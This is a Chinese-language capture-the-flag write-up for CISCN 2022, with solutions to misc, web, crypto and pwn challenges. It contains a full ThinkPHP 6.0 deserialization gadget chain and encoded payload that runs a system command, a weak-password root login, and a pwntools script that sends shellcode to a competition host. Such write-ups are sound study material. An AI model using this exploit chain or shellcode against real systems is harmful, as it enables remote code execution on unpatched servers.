CISCN 2022 Writeup
3 min read
感觉今年的题目比去年的简单些,三道密码非预期。好朋友帮忙做了150道选择题,然后出了六道CTF题就下线划水了~
Misc
签到电台
首先根据题干,向公众号发送关键字得到 hint
打开题目环境,发现密码本,然后根据公众号的提示,7*4个数字也就是前28位
点击纯数字模式取前 28
位
1272685121234614783219665440
然后 弼时安全到达了
所对应的7个电码:
1732 2514 1344 0356 0451 6671 0055
先 get请求
启动电报机
/send?msg=s
然后 get请求
模十之后的 28
位数字
/send?msg=2904836534674960728375375495
WEB
ezpop
tp6.0
的反序列化,直接百度搜一个exp就行了( ThinkPHP6.0反序列化链审计与分析:https://forum.butian.net/share/1168 ),我们只需要找到反序列化点,经过 dirsearch
扫描,发现存在 www.zip
文件,然后在 index.php
控制器里存在反序列化点
<?php
namespace think {
use think\route\Url;
abstract class Model
{
private $lazySave;
private $exists;
protected $withEvent;
protected $table;
private $data;
private $force;
public function __construct()
{
$this->lazySave = true;
$this->withEvent = false;
$this->exists = true;
$this->table = new Url();
$this->force = true;
$this->data = ["1"];
}
}
}
namespace think\model {
use think\Model;
class Pivot extends Model
{
function __construct()
{
parent::__construct();
}
}
$b = new Pivot();
echo urlencode(serialize($b));
}
namespace think\route {
use think\Middleware;
use think\Validate;
class Url
{
protected $url;
protected $domain;
protected $app;
protected $route;
public function __construct()
{
$this->url = 'a:';
$this->domain = "<?php system('cat /flag.txt');?>";
$this->app = new Middleware();
$this->route = new Validate();
}
}
}
namespace think {
use think\view\driver\Php;
class Validate
{
public function __construct()
{
$this->type['getDomainBind'] = [new Php(), 'display'];
}
}
class Middleware
{
public function __construct()
{
$this->request = "sp4c1ous";
}
}
}
namespace think\view\driver {
class Php
{
public function __construct()
{
}
}
}
payload
// ?s=index/test或者/index.php/index/test
a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A6%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00url%22%3Bs%3A2%3A%22a%3A%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A32%3A%22%3C%3Fphp+system%28%27cat+%2Fflag.txt%27%29%3B%3F%3E%22%3Bs%3A6%3A%22%00%2A%00app%22%3BO%3A16%3A%22think%5CMiddleware%22%3A1%3A%7Bs%3A7%3A%22request%22%3Bs%3A8%3A%22sp4c1ous%22%3B%7Ds%3A8%3A%22%00%2A%00route%22%3BO%3A14%3A%22think%5CValidate%22%3A1%3A%7Bs%3A4%3A%22type%22%3Ba%3A1%3A%7Bs%3A13%3A%22getDomainBind%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A21%3A%22think%5Cview%5Cdriver%5CPhp%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22display%22%3B%7D%7D%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3B%7D
密码
基于挑战码的双向认证 & 基于挑战码的双向认证2
ssh连上直接 find
搜索flag
find / -name 'flag*'
cat /root/cube-shell/instance/flag_server/flag*
第一个flag是 基于挑战码的双向认证
第二个是 基于挑战码的双向认证2
基于挑战码的双向认证3
非预期,账号密码:root:toor
弱口令
cat /root/cube-shell/instance/flag_server/flag*
PWN
login-nomal
定位到 main
> sub_FFD()
很明显是对 sc
的执行。
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
# p = process('./login')
p = remote('123.56.87.204', 36979)
pl = "msg:ro0tt\nopt:1\n"
p.sendlineafter(">>", pl)
key = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a071N000"
pl = "msg:" + key + "\nopt:2\n"
p.sendlineafter(">>", pl)
p.interactive()